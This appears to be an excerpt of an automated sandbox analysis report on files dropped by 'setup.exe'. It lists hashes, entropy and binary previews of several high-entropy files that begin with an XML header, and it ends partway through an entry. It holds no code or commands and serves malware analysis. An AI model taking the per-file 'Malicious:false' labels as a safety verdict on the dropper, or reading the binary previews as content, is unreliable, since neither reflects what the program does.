              SHA-512:00B88B4302D9FDAC10C92B52B212C2A50465F02C7DB6574C9C700CDC682F9D98D4A0DB56888E55031C5965CA1011F1151210028D820D5BAA31966604555F4538
              Malicious:false
              Preview:<?xmlv...&t...->.......7..e..3.<)..jn......-i(PQp'.+.......>...s..^0Ad.R.?.F..p|Pj...F.6%7T.,..W.....$=.!.c..}...$.kt.5n..T11....Y..|w|.....{....i..?.4..w..a.......kiV.....rZ......6...O....}......;i .g.".......Y..Z..P.Z...- .o.../.&o....S,...#.fi.......<N..1.._...3..f...J..?g..!.~.uk)....g2o..~.......f7.0 .....4.$.6.w@.'r...]....)..d..O.=.....@......~.T<q.u....`.(...C...X.V.`g.%.%.v....b.q..H.G..P...'b..e..*Z!..CrQ..iH<...1C.f...:....._.y>......4........Lh#9.%.d..5.WS.3i..[..Y.U.,...Y.[=.{...m..."...... ... m.X)..8z.ytv|.wY1.UP..#..A.`a..E.....M........v{.*..U&.w...[.....1(!...f.!.xXH.....u....?..Fm.]......n..A.....7.QY.P.&......'.`5.}..WPNc!V....'.0..(EG...c..GEE.d.q..$^.P..r...F.@.**I.x..Am...K.{.m....m.m.I.......o.A.(..;...s.`,.X^....IS....::E>...o....u....i.K?...M....it\.[..^.A.. ...D.........K.........pi....!.8.(<.&$D4......j.6...h..&....U.KK......<tRs.`..%..@.dE....m.9...N.\$..\.....]X1.....J!...yG.......5.+.....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1695
              Entropy (8bit):7.867713908623351
              Encrypted:false
              SSDEEP:48:8KVA7i5zX1XaIc2bCs0EUlH86cF9s/aTHFJbQh92A2fEP4uEk3D:LV+mzlg2b9mFtcFWahVZqEkz
              MD5:64FD67963B2113479232A3BFB9C5F64D
              SHA1:77B4C95468E84B3644480D8F2CBBB8E1EFC06070
              SHA-256:B2B121618D772EE55A35D77DA108D06AEC978E089D6F923B218B086F4DE5E325
              SHA-512:81393EB054F557A66827D2C8BBA1C824D1601BDF0E9F26A6B16FB75CAEDD4A53A51862E927FCCAE5B6874EBF12612B2682AE5B33D6646CC261B8249185745651
              Malicious:false
              Preview:<?xml_@Q<.....g.9..../.'....*.Gn...j..u.xz...."8%.......)..g}...+.s./.Z..C.h.T./.../{...[.|.~DT.....=...9.....t.(Vz'...O.k...[._v..S+..:h&..W"..........Qj..../..C.k..Wl..+`).".....C.......g...._...N8a..=G....5.......u....V.....?.k..:{J.]..H..a..?.4^=...&.T3.7..Y..{r..Z.i....]..;.S.... YTQ..B...._+.-............h..r.9.C%YK.b.}..3.Y.x'......Q*..ceU.. -.ww ..TN3..]9..9....I..O...-.#....s....b(-..._.#.9[....?........r..A....S....X...Q....I.....Y.d..-.. ...z...r..;........."..3_Q..j.NS.z..d}o.m.{.|..6..lu.ssYt.Y.?...sC..L.rR..n6.g.]..S...2...G...Fm..c.v..`.x.|.O..=g.t.1`r..#.c'..Y.....G(.>S*`B...,..h{G...?}.........M...p~..oZA{.C...y'...n....x:...j.mz....F..23...]...*.9..*.(..c...?....m.H:..+...i.......q...;z.#..S...{|Z..~...j..`..5....^..R.....@%...6...$...F...'.=VZM9.A.....&...H..0......x..%.%..kd..K..]MN..9.<...D.z."....Y........?...B...q`.h..}....fLA.....F........Y....UV.$u.vMIR..N@O.M.xb.k....h.p2H.{.{/x+.._D"A.O...]....}..".....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1732
              Entropy (8bit):7.866374863118609
              Encrypted:false
              SSDEEP:24:qXpHoVMCV6v7YkDzwTdbnH7cIo18HD1thf6BctmxCFkrRNYRhlJvSWfVyU1vCRiZ:CHodV6v7TDzobgh1aw6mUFNH5Va6ntPD
              MD5:4B164B8225F15709206621C2BF1B13D7
              SHA1:241698F712B857F1A46027FF30B33C3059C9F3A7
              SHA-256:1B5641F050A298513386FC1FA86FADBC8E79EF2E2A56A60268417F899418A20D
              SHA-512:422B9BF7E2C40F0E8C874F9F4DCDEDA71491D57615B5811F6A7074C5C59985A672AE8CC3A61A235781EF1E719D831102D30C5B80744F31B64E1B4D4996E6B494
              Malicious:false
              Preview:<?xml......s/..<A.u:K.v...b.../v"..1'............".......J..P.{.c.*|.D].....s..A....[...g.......{.j..v|.O.t......T.......hN....Qj.4-0H&&..!.U.......8.7..y......:'..o<..[..>..T.l}6.D..l/.n^.r'.:?.&}(df.....s.&..'.p.r.+....dG!B..A..V........g...X..!.sq./... .Y.5...r.%...UC././....I..B..7y..F.{.>:Bf....e...*..W...?.]....r......._.R.?.W...W...@.7+..d2.....e.c.....F.5...n.fxk..Q?......~.#".....B.........[.........q....P.....v.%..E..... ..FS...b=..a.".ON...p.G...v..el...6.;.s]O88...0...S...l10,..#.....8..GGk......j.y.]Y....W..Wt...X".IC}g.."J.m.RPG.5)...'.k.s.........j.+."..D.9.O.2..i2..;#..\.0.jE.......6n^q.qL.Z.......lT..C4.k.>..iGK..`..s.9.SBa..X......Ro..47.)...G..N.p.72.KN..'..>2..j.q....|...P....`..G...^..C......l..%.N.n..K1A.Y..s5.$......&...xi.}..GDR..:kY>./.#n..1.I.3(`?..u..Y..C"..k.....r/...D.C....%......S.1...K7.W+...o%,..j+S.....*.....B..GD.~g.......9....m..I...V.+..v1NPj.C<_.^.....y..+@M._.AF.r@r....E........:.=.oN.1[q6f....7
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1693
              Entropy (8bit):7.885629607729718
              Encrypted:false
              SSDEEP:24:pRaNZIIIfyp1hqKlkymrHm6HghAWFeHug7mAByRzgfd2HX5fxxj3E04yhibD:CIIIc7qDymZQpFeHqBgE35fXwD
              MD5:1B084E7D1BEC53576143B15EF8A9AD4E
              SHA1:4A1CD8A419FBCD1A269701223709C974DC81424C
              SHA-256:34B7B5589C59A54A758B85866641CE4B98A665FCD30E41F11C29DED22234D6D5
              SHA-512:2C9DD410F2ECD3FBBC6DD15A9D7298CFF51D3E62D5903B9D6C298F88A601CA54FF3CD98128BBC2CF0C9153D985446B66D3698F250784E8BDC42FB9DF2574EC7F
              Malicious:false
              Preview:<?xml.{...w./..$....!.tK..]..a8e.;.....B.U...W..y9U.Va0./>..&-.pO..c.Yk.....T..bf..-x.=...P....w.1J.ey..p...|....Z.SbX.3.*.....Y..Z.m.....H.s.....Gb.z1ar.pe.k..7y>.....r8...>0.E...4.q4.l...W#.K92|..2e.W.[.s.w.B.*R....-.F.%&...#....v..F5Qx9......l%U..gO9cBO....g....$.....u...t..32?.].aV=v.-%hA'p..#.vp'...H|...'^.h.cB(...l'+.c......z$..o.r.....H..._...aU..X.....X...#M..n..v........U^.-....8...]..G..;..U.V.].+..C2.Y...w.._.F=...sWV0..)J.Q%..1.m..o..*D.2.p.N<Gw....*...R.0..........J......*5ToG%.x........_.@.p%..x..@.u...p-w.y>.i.8]4..%.A.b6.%..@....|...I.s....N=..!Q..?.O.y.k=+.6s..b(.R.y...h..p~.b......5.&..^.*..9..#.`.....*.yx..R/..6.*r..m^.G..|;..w..c...$u.9..7(...&..].p.i...^.....+.Rn.*V. ...T.b...l.%k..Ni.....A..%.s....o...K.R..L...l.'..#.m...2...Iv.:t(.kw.8.bA..[?.}r<]2..)p....t.:.av...r{Q<b."....E&.....IaE...Z.V&..l..m...&...Z......In.....@.;Zk..83.?....y)..~P....z.....6.....%...J$+:]H..Q$A...#.-\.2..%.....;.E9/.M..&....4
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1730
              Entropy (8bit):7.892326315318614
              Encrypted:false
              SSDEEP:24:eUJetv1umAYLWsI6tdFtPjvY4j+FYdHzPQKzdvTMl4hxxm86k9pmem1OA6SLNKVX:eU41nI6t1YN+T4GvTlvpLm1USKFD
              MD5:A5FAE9A07FEABB936F6D31176E2D0394
              SHA1:690EF0097D8A808D44A714593B34C2B165351D2F
              SHA-256:48CABBCC7661258C595C88CF04F319F13C05832BAAD07BF22DAA6FFD9A47F8A9
              SHA-512:19F60B506F54F713C6A3348F5A7B246FC1F666EFAC0413B165DC5881532510AB75592DB82B1A39F65ABFFDAD4EC5DE7B54470544D5C3BADAC8FAB17B7D37AD76
              Malicious:false
              Preview:<?xml.o.D...............P..K.ax..........Hg.....W...5..f"..H?V..Q.......(A..1...9......g..~.....'^y.......Z...f.....".y..nA1..@.......b....>K...I<d|.P......B...(S..\.a..N.n.@...@.b..!.Y..UL.3.....K.s.y.._..8../...i.=..lw."...j.X....).R.b.q.h4...."....k.WU,s5.QJ..>?...... ..5..j...s<...c9v..An..A.......-.5s.bo..........c...C.q..kn.T.4..w...V.:..%...u!..1oD.A.......@.!O.......K{.."|RGn..p1.........{....kZ.U.].E....Q..bO.{.....B.a.a: ...L.%=.V.N..=WP...Hb?.......t.o/Z...6h.]..G.[."@x3...)........".;2.....,..a.......T......d...d........M...$.....zF.G.@...]_n..0.Dy..X^{.!.0...v...?B<0.#;....T..,Lp.T..>)g..F.%y,.Y.j...E[.,.....2z..F.z.6..".nB .c.%*.jX ...S......J.n2b...3I..b..Y.~.6...<....Wj=......ev....bf<.(.....S...G.[..'.mk..B...<D....Q....8....Y.<X.8._.a..m. .....J..w{.d...|n. ...@..@.:.H_.0..........b...+].S.q....8p.8...]....;.WSR.s..3&F3.}..2!|!...z0B...H(..\I.*......M..eN...!.-\.^.(.Q....]T..U.^..V.>.s.:.%..*......G..J...\H...|H.)F.[w..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1715
              Entropy (8bit):7.890112809386719
              Encrypted:false
              SSDEEP:48:ydcN5bqlL4Mvv4IFEaPTNeZ20r7RULdHWAD6+MaD:ygBqlL4MH4eDTNOlULUdRy
              MD5:779C595B9BBEBD998AA97F8937BBA939
              SHA1:050E83ADDFB5ABB2A52B25E15DECAB599C3C181A
              SHA-256:59210E7BF90CFDD9E8BDCBDF8D16443D1D3AD28CD2805D332B7F51D31FB4AAD0
              SHA-512:4AFF6B5BE6DF3A46E35B00FC6EDD31CCA710FD5D5CD252E3FED53AA1F22E2ADC981A0B338558D75C1A9360296951669D3F9E3719A4A98138965914600C2D21A2
              Malicious:false
              Preview:<?xmls....Io..|x.._....Ij.G.....J..........zE|x.~7.h....S...z..S..w..Q........<..(.@../0.L..............I.)..V..t.>..g..u/0.W.K............i/q.J..`..IZJ........v+.h..N.s......(AD.[/...H...W.p..J.B./.?.7..Y"..w...z..gj$K.h....f?..O.V..^.l%.|...v`"..b..;A..+a......=..v,..j...Q.y...s.4=.$.X...vA.d...J..vu)...8"..*.|M$.1kj....# ...p..K ^.c...5w..k.a^M.....}.LGIy+.^...^u...!3.8.....G..g..=..m....Fq.O.........k.....&.:.......V*.+M......,C.d...............|(3.j...A.&F....u.J.+7.[.....-.ZZ+.va....e.6..'WfN.=k6A.....[.ms.Sk..K..?...d!..^..A.......+......c...W...s\.....'p...)".Rs.QP..p:.X.C.s.y~..:....S..|$....K...u..{..1+...h...=.4.1#.>A..rxl.....Ig....L.E8..h....=,...........X..B.U:.mJ...AC...iy...k.F?.]...).m. W../...E.>....+.2...s..1k..SE...<d..`...F..%'...~.T.?,.....#{..Q....b.c..G_..W.... ..[..M.*..R7.e...Q.%.]...2..UO~xq.gx.d}....t<;c..:bb.I.d..4.3.0...I.z.U..t..36.2......y.Z0..e.'..h....7.P....zl9Zf.....Q..MX......P..^&..w.J..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1752
              Entropy (8bit):7.89058936883779
              Encrypted:false
              SSDEEP:48:TBBRGig7I17zMeTSGur0d8SIxZytEXULfiC4ZTotGcVa8D:F3hg7IFIeOcEXULi3ZEUYL
              MD5:FB71619AA988B93AE38747DE35A3D9E9
              SHA1:DD87858DC7937593D0D11F845C7D38E6C63153C5
              SHA-256:70F17906400D39FF3316EBEB5F7207C8ED9779AF1ECE8125EB1450EA9E314C8A
              SHA-512:BC3D4C670B1674BC07DA04079EBE461D7F2AE431EAE4E2EA57ADC926E5649E80A545E9CFEDE981C9BB6B1D11A93916D8917A785115920526C919288350103C67
              Malicious:false
              Preview:<?xml..Jf=.C.Y........^.pKE..(.;..B\t.9.H........X..[..6.")....sI-..........q*ks..C.A..d..e..K.4H....k.......b.. .....;..?d..T.....(..4...].....e.G=.2mM.rJ...7."..8<....:Z.M.......wT8..u.....lF{.q..m.$H.....p.Y....`.H..gj7....X.....7.4..}M.n..+@.......F(E%..%@b...#.*M.o...Z._..m.Q.......G1..8[...U..x.|d$...u.U,......^..}...y..%4..... |..B.......A.;|<...o...+B..2$.S}O..........hC4...j.X;.,6...........h..d.UZ..".r..3.\....Ga....o.8.?.....%....6..9.t.2....0./.6.zy....tg^.S...-.....k.R.Y.e..Y).kc[W^..7l.{`Vx..?T.X...RU....,K......7.6.-2..~.c..>;^..g.eb....._.K.V...W9....r....x..Egx...v2Sy.p..{.{EK..\.._S.Dx]KK^.TkB..V...?.g...}#...D....=^2..U.uG6|...I.~y...h?.R....(..U~gJn.+.X....C....V.../w.xV...E.c.J.,bn4..n..Zv.@>g...I. ....^...S./..9Q.>...[I.........Q....($.[..Q.-.kZ..[.J.>v.2.p...&.............{|.I..cG.f=N.....8...m..@.P{v........q#5......}5..9.c.&'.C...a..8.k....n._.s.`...UwL.@...5l..@.y...Q.J.<..&_..a....1.RR...~.f....{.*.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1699
              Entropy (8bit):7.882719940872852
              Encrypted:false
              SSDEEP:48:FchMq0nUr0rcAZiQQXOqVYArZVx3cwGQwCbD:FchMer0r5PQ+U7FVx3emX
              MD5:EEC21AF0A2EC10B692ECC65119D35CE9
              SHA1:952D761E36B0B4B3A02FC0F0E838A80F5FA36E67
              SHA-256:F11734448A2F62287A844B2F8D5EAEB37CA201F6235C9DDBD49B3CB02D104B37
              SHA-512:83DDF4DC244FF2C0B64BE1C454472B6CA6D9C13FFFF37051857AADC4429018767F34464CE8297E95D4E4521A628DDA34E9C1D231810AEDC03390E7B60394118D
              Malicious:false
              Preview:<?xmln5..5_H..j..:0...].....p...D...'.'..cd..2.-#.,8.%.._^0.P?...K..+x.`v.....<...0.-..c...Q{.U..$.,.@....zh..y..l..p.c.. ...I...kD..E.w.C.[o.&....Eb,.a.(c..E.A..0K.......b.n.P....[C....8...3.P...*....& v.,.g..}.~P..j..G>.uz.V..2.eJa|.y...s.X.....cRshvb.....W...)\.U....(.x....[f....&..T.."..Y.L.~.lx%. .._^.pl...46......2.KW._.k.*...tt.E...BE.gG...q6..`".;../.nB...+.6.d.3...EI..7]^...!.D$.o..^Z.[w....?Y..7....4...9.4[.q...H.y....9.....Gg5....-...=4.....=....I.<{...g.@`.....y3.@.W.).C7...5g..:U.."n..5_...s6.:............Z~.K./C..N.D....w....z.......o.iE8...T...g.2._t..E_....Kp/.W.. ]._...Lg\=y[.7.NJ.P,.m<.....>...U..<..u..&h.7!pu.F}W......n..R....1!..d......K.tt1K..~j.I..o[.g...i...`G..@..(..4oa.....JA..x.4..PM..WL..,?\..KG....`8.7..mpt.....-..1.F_.o.^&Yw.....`a...a.>.......uf..%.Wz.5A.=.*....<..0;"I+..j.b.^.S.I..X.zU{.....,8.7.WZ.k...p..+..K..57.~\3=...s+..Pu.%/y..........[.{..Y{....R..m.0mqF..V.!.......:...&.. W....d..u.L.........H0...h.O...y/Z
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1736
              Entropy (8bit):7.880026651193702
              Encrypted:false
              SSDEEP:48:3nfPX+iHIDAPFLFQr3cYvHSwbcU130X9iyD:3nfPO8IDkLFc3HHSEcU1CUa
              MD5:8A1683D27B35C029AFAE1688B40EFEDB
              SHA1:541EF86E43741D3479F08118107F151DCB071CC9
              SHA-256:3CDEAA8CE51FA379B386AB855A3863E91E61EDDAB0EE7147DD01DCA3C344CD9A
              SHA-512:4004254CD1D139031F6E2A7167A833075E0C1D83D2D4E35740D0DABFF05626BB21C9A0577780E900C0917B29CB581FE9DFE16F95F9C1911E72953DA99F9EEA2E
              Malicious:false
              Preview:<?xml.L,......h|..\`...Oow{.].....V.EKIv..B....Ya.9q....$3|.#......-.8...W!j.d.K..G.{.BJW..YL...7.;.H.?.K..K.....L....r?....z.'/.p;{7..:.lD2'?...hL.....*aM .&K.B..Hl{.......5 .L%..i.....l^k...w6[.....=.K.#.E..s....}{...(.t.......*V.F.B}..........Dy....r.........".i...m.Q.dS".!.f.......O.....C....{P.v...rK^.|.a.\....o3..C.}.;I..mk_/V..x......z..9..1...M....p..E..5.A.3...A9...HB....!....&+v..e.;..*x.Qq..+.GC.]./M..VT&XQKjy.o...........o.N\.i.4.`K...NSI{.A..?..=..mN..-....K2.?...U...N.4.:*..s.s0.6m......~..........Y.mS.d..Z..........(x..q..q....+D-....JL..?C...&..NI....n..Z...$...7.~$.<.J....S..X....s...9.......z.v..x../....;Z.|.k...F....^...3..r...XZ....G.dr.y.)...W.L...(.~0..nx..J.5.h..........y........&...~9=.H.B,|.,;.Q...8../.. .`...J.+......4...5....,..i."u..4......>...2......M6v.Ge.Osg!..:<.F.N@.K<....v.%^.....X)C3.U.).x.....0.......'...v3..l...cY.......nE...Bh..-...\l....N...)...).....2.=].@+.!.t.6g...6|*a..;.D.b..s......Q.p...3.|..42....O..G...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1721
              Entropy (8bit):7.90055143039573
              Encrypted:false
              SSDEEP:24:QF+2dsnBI5iyagv4iC/9O+70PNs9nX+z6empD/g/6sxEDL6W7A8SVZSHbD:E+g2TqhCN+Ne59dg/dCLW8SVZUD
              MD5:A95BE3BBD654B7A14E86EBDBF9AA98C6
              SHA1:BC3D7EA778CDE99BEFA5E3C36626BC724F898EFD
              SHA-256:77453ABE13B059D0944D1AA59AE6ED9D582B4BF0FB6C224FDEE97EDABDB88A34
              SHA-512:6A60FFB91574FBE3CB9E7B594DB9B6872BA30BFD73F4DA442A9FBDCBC5657C2ADEA89D164138465FD0048E4F593351854B65029E8671B390D09C7A989CEAAFFA
              Malicious:false
              Preview:<?xml~.c.,..Z].4}.1.~..Av....\.>..Ym.D...s-.......5.t.3}-..W.d..u.w2...jD....^t.....:0.).jT.42|.6b.WV...P..?.%...X.].{...v....F.....jxA..B.R....wl.2.QC........(...(a.4*PP@d.j.6.#..Wb.5p.......C.....o.....[L[W`...5.n.e#...l...Y..I....xN..H.<%.i.2....m).K..t.....?`.H.g.X...|k.J;2....#...3".C...Fy..../....f....uJX...~x......z.3M'...^.....(A.ADj+..-.Q...pS....!2~>9../........g:......>.../}.....O....../......K...M....Owc...E8.O.C.+&..J..0..(.._.>PV.7..a....'.N$....R...d....*...A.U.$..JJI`..^b.f_S.MT<.).y.a.9.j.S3....-Z.t.k.2.&....Y&...#.,.e*c..:.t.?.c..c..,E6..{...T..~.X.=Q.>o......fU..e...(%.Fv..`}....?l..Y....|....dm.g.7..@..H..6V..v...w.9x.\.]_.>..D.S.gh.7.KH...&.D..G....^.q=-.~w..D.....]..O)..e.9....)...d..rb........._+.D....w..?>Ux.f...^.8.gE..K..`;...1+c.C...o.ZD..g..W<...e....E...$HL..ZL...J....."..>..r....jG..z...N.XU.0...A.].....V-&..........k...g...!q...}....u.......$....=>2..I.a....3.0...[......_x...lb........1`...\f...3t.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1758
              Entropy (8bit):7.903617619963051
              Encrypted:false
              SSDEEP:48:qk+V1BPfubXQEZjtkHk6YEsOWcTOtWa8GufCipF77s3gD:IPfubAEZjWHfWKk/4JF7YM
              MD5:2A0C8A197D1FFA0C9529683F88F93DA3
              SHA1:E527D4A0BBC5E7448D06109325EA4E06CF56715F
              SHA-256:B1A8AE6A5BDAB51C417D76004CE484E40734A9230AF1BA955502A4CF2FCFCCB7
              SHA-512:7C3AE1499B93E0A43B26EDC92F941229DD1F3D4B7EF8136FA1FD764F4AF2F3430C05A3C5A8100B82A22637B772720A53B60B8164E9B6B4EF47C976675976DECA
              Malicious:false
              Preview:<?xmljG.i.....C.c1Z....:..lG...grb...*.s..i.T.&Q,$!,x`+..~....p.....g.Ny.I.p8.a...#.....(.D......j.....:.i.&.b.......u0c:.....)`.r.(F;(.....c....?av.<...~..y(.zu...j.....K.)>`%..<fM......[...,f.........|..&.B.......'..rR....\.?...h..T......0.4p..Q..7.G.....:R3....... ..S..d.!.....E....CA..ltl[f.:....n'....w.w.bpaW.vN.....%......>.$...2.[+...."............A]...../,U.....R....<Y.f./.!.u`o2..O.=).(N\..b..M}.C.Fc.t....a.WzeD..x(.......MQ.Y......%2........N}..+.E......K@S;..........B..&.N.y3....C....."k......1.l.<.?.D.Z..0.....#n5...U...[.4~......S.q.a.J....9I.j...98..'.. ....~*G1!..B5.GSd.1..VI..{....@.p..646."....".zPgh.......kt#{.....E..n./C.(...U.4.^..W._Y.].M...b.#0.........e...D.K.@..^(.F.\...6.n.\.U..E..Q.....K.`-d.B..j..{2|..9w.......Z......}hs.....X.......(.....2+...;..?..w.v./...I.....b.In.....(......-... E.&.w@..../j....h.tuvQ.....{...f..A.U..|u.n~.g\.2%;......fdH.5j.m.m,..f.%.....k....:W.A.u...e.\...x.T...cJ%..F\....o.6f..3.+
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1705
              Entropy (8bit):7.8919588996904135
              Encrypted:false
              SSDEEP:48:A8DBCm0ybpCcsdIqNfQZgsaJi/jXMMPrKOJfErD:1CObpKT7sPj8MPrKiC
              MD5:B7F810DCF0940F061B99874794D2933B
              SHA1:F0F179B4D2A6521FAD9081A8A36026A25B205705
              SHA-256:C5B2A294C89CCB2106B76F8352AD03EC9FC2117330ED658E176597DBC21D3978
              SHA-512:7232E6D4DA013D7BC646767096197DDADC4C92DCD5B0EB7238DA5077B881A303A3DF46FE0F59F44FE2F53627E90B3D5530E9726E68E8DC02615E59B5E8F3C203
              Malicious:false
              Preview:<?xml}Z.....7h..D.......N..d.-.s2..i?.pv.B.v....dv....I...>6*..8...c.b.z..[.YLQ>....f..$.&.7L..S.X.....+.D.....[p.q...w......g..'./a!t/..3.h..a2vm../.....M...Oe..C........Y2........x.s.T.dVq......W.K.^CI...t.%.g.#...O..o......~.`.G5..~<P.z<.....B...u.Fd\*K.!V.g.....No...:....9 ..u.Z..}....?'\.'f.....e..y...or...Y.CY....4..K. ..>..b. K..C.....*I$1..}.\...m.r..a+#^.Fw... BP.......^..8.q.s..G.).g$......{e"7.d...4/..........".6.J..K.K.C...,....}*.(.i].t3...}....PU...(].B..z..T.......o(...}..P...g..o.Q>.vwh.E.raa. ....z.p.F.Y..(#`0 ...z....`..\...G.....q..-..V;.$......}...{.....W.....|."OS].41f.G.._R...e..M...qdu......*.]%..1...Y.9..Ev.....T....UB..X.bIB.3l..t..Hv-....*\..7..I...'.n.,T..QL....k?..l$....R...o.O..'ID...,!n..~...ro....x|.e. .z.i.!4.......c. bW...pKA6..{.._.m.T..R..........z!q..C...c.O...U..|.X.7..Ei.a...,../.....J.%.zF.-..AZ.o..w..........R..R.Gl..O.!W.....YL..<&^P..O...c.'C.93&...lJn..'n..'fN.jk...>j+.`....h.C...#.W....c7.g\4.vz
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1742
              Entropy (8bit):7.889986179126355
              Encrypted:false
              SSDEEP:48:0NWI1fRSaFj3XBtHQB2ponEEI1/NuVGio8D:0oI1fR5rQB2poIv6Bo4
              MD5:9E9F473ACDF632D9D2BB141E1A1A679C
              SHA1:FE76A9BB8235A19A7C59B1AAD44CFEC693BADBEC
              SHA-256:B2DD2C5786B66809228CEABE986C4F27AFCAAE56F9FA660DC68BA24674E7B9AF
              SHA-512:CD43335D728ED0BDD22F279CF945B390961DBB5AFAA23BE0FE4FCFA29BADEBAC7E118EFD2BB704652FA7A1E96CDA65AD2EC4682A73A44D55BC3E98DC3C8DB5BD
              Malicious:false
              Preview:<?xml........p..P..G......~.....It.ae...j.[...$m...5.h.9d....@.......6I..F...I|tM.."bf/2...:\}..2(0.*.,...(e,Qu..Z...)....du.......ur.....W..K...."...VK.U..|..0......k4.K........>.3.FG.h/..pv....\..Zy...T.h....:...@My.xe..k.{l.. s........-d.D.+.!...o.I>....E......4........s..J....9..F..b/~.rQ..2ti_..N....~..E..O.>.U..F.2g..x .._..s.45.&.....#...\.....Qf!..wL:.Wo;.....e..w.G.......wY...2.R.].$..I~C..W....R.q....}@.$.d......h..!IN./......t....x.TG)...e'.......$....H..f....(L.l.....c.F..y.......C.....Xy..q8x.D...8...o...r...LR.n..3..DK..1..".3..(.....oG=2..B.]&...8WeD.._[~...#Z.T\C..w|Y...b.]...V].R.."3...9.kRP.qiI.;!}t0..0i..=.PN|...Tj...:8@XQ.2...1N~...$.y......i..".*r.z...I...n..4...k..@Q....zJ...f:...5..p..\j.J&...*.........4&<.S.L.H..k~..6..B..Nn....s.T^.V...n.U.l<...(A.U.\.."8c..LYG..T....y..^/..Ve...>v...G]S.n.Vt..l.....i......~.=t.\.4....7...@.c^..!Q1.a.|&.}\.\.-.v..iz..1|i.X.J....z.~.].u......M.........".g.Z.nt{.m...g.]+.1.2.............i.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1695
              Entropy (8bit):7.88643050109788
              Encrypted:false
              SSDEEP:48:ss5bt8ZQjc2kECARwId+GhQGB+MuhQE7TD:7vO2wc+GhUMCQE7
              MD5:5DAB8EEEAA6A4AE9058A96E7BDFB7875
              SHA1:C3D0503DB0135ED05B869BF41E3A7ACBBA47EB84
              SHA-256:547EF457CE18B577AD9F8FA31029D2423E76058DCB0E46E0A43660D802AD9910
              SHA-512:7A3BED2570B7A18704D33F8F2FAF242DFDD62C32CF7BF2940AB4732D707EFCDD73D074C00E1F2A80C7B011A42A69591AE11747D773C4CAFE5B4B9BC4CDB09AD7
              Malicious:false
              Preview:<?xml....c.vNWG=..K.X.`.......SYy.k7|.n.~.......H...G....e...7A$..FAP6.J(.t.D......lv.}.6...R..Y.......Y...,a.+.G.....FkvE.Z..;.).\o8m..C9/<0..5.y...*+......d.~.:..I.g|.6..o.........L.q#..P.q.o.eA.....E..._....l..`../.........!.&V.._..`..h.v....7.}..e4P.+._e..8\&-S..e+.U...G.Z....A...<.3.....}.RTw........N....v9.|sx...m..G:W.....2..,]..N..BHj....)3a.)...V.....uVZ........P.....g.....Y7.`....r1......Q..eS..Da.)..^..Vc.b|.s....GL}d..{?...5S..w..p.M...)..o.q.../..<J......&.e.~.=.;.I...........6..jrI.aO.......Re.u......i.F..."..m.Q..p......x..LjE.0.]..U.A.).6.9|f.R...dV.n..(.RX% .|6....xc\k.p.m..`..R..d..w.......<..../Z......o7...7eT.,....g.].:.J(4......&.b..U.d!.[F.[...PK.V}....[ .....}+....I..F^.]>.(.......d..d.x....,)........Q.S....5.......*.<.bq*.w....js)...../....M.s....w..(..G....`.6..!.p.O.wk..K.i....q.%+.A...8..JE.D..sm..#:...B@.-x.{...IIq..@..9s...26N......4.......26.;Tl...*.z.n..=..Kf9ns...w.q.&.K..YX..$.Y.....s.3.bX..O...=...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1732
              Entropy (8bit):7.89009790744548
              Encrypted:false
              SSDEEP:48:IR4KS/7LygTjZ1G9MV9llB4shUjU6QYZCID:UbgXZ1X9lgsW4a5
              MD5:2C342C9D0258FAD4F46451EC2DA404E8
              SHA1:4FF87401BB648C3156F468C6991566C212151B48
              SHA-256:7662E55C3D5910979CDCD26F04E9AD4A5E553A1A04E541E1CD84C000BE9E1435
              SHA-512:6BF423B5D7BFAC559F8978EEFDE9A7778C01A3AEAD6CD006D845106FF15C33F09CAA0605BAFCAE9B3B672F64916542A2165EFCC8B97486DAA7976B7F2DBA91F1
              Malicious:false
              Preview:<?xmlu#.2...-.'.P.h.....n...m...G]l....[.Oq.(.=..G.$e...1.<.0...../.'....r.`f.GeI.#.{.%O.Dz..G.0|...........+.........|................m?kR..V. S.....)..GG.c..d...%.LS..Q..P..S<.......h.$..1|.3.>Xa..O..E..f.F....py..O.}.1.:.PTS.. !f.7HT.7......1..w.s.K.A....8..i=..-....dukP...{Q.lG.}.lH.....$.0...> mw]...dX.H...g.]?..<.O...?.".(c....k...K^1..A.K...1..t.6.e.......7...k..a.[h...y....iJ.......x..y..U.<t".)x.%p..)p.p.y.VJ.<..h..h|.5.|..4z.@.6.0l.3..`G9./y.J...r.q.....5.L..........7M.z[+..+.V0.Yw'..+6.....D...'..Q>t..5 ......a....<.d%x..w.<..].!.E.[#u_.....k.jL6...G.Rx.z..*...].jq.3.p?....{..S..J...x7..j....rv..g....|.8jH.zc..bS.....!....../.....Z.....S.|.~E.L.......59s...&..kN.k.+..n...Jm.=..d.{.....q=.Q"........`...S...S.r.^.t]..6.#JO..I..zY.Zz..\h.N.D.J.T.<.o.........&.....S..Y..p.G.Q....]h....,..y:....F.g...9.HOn........f.9.416.x....$.l..'...@(..iw..(....+..+e.x.Y...PW..~t.*\.f...x.....o^....Y..........;\....KaFD.u....#.....*j.<$..6|..8....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1705
              Entropy (8bit):7.8853465783968515
              Encrypted:false
              SSDEEP:24:ckins0/nFuntQIEroMX0wHO+/jve72T3BOniaYH/0NfPyV7K/0e5rhBUJaikDZLj:c/Nt+2mMnE2TxGYUC2dQaPx2GCkTaCD
              MD5:50E6B4A1E69780F74CF922941A4C7C7E
